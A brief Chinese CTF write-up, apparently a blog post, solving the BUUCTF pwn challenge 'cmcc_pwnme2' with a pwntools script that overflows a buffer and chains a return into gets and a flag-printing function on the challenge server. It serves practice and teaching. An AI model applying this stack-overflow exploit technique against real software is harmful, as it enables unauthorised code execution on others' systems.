BUUCTF之“cmcc_pwnme2”做题简单记录

这题还好,值得注意的是IDA里头函数栏里面的函数名字需要多注意其意思,说不定就
是提示的信息。

from pwn import *

p = remote('node4.buuoj.cn',25488)
elf=ELF('./pwnme2')

exec_string=0x080485cb
string=0x0804a060
gets=elf.sym['gets']

p.recvuntil('Please input:\n')

payload=b'a'*(0x6c+4)+p32(gets)+p32(0x080485cb)+p32(0x0804a060)

p.sendline(payload)
p.sendline("flag")
p.interactive()

有个比较离谱的是倒数第二行,如果用“p.send(“flag”)”那就会报错。
具体细节看这位师傅

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值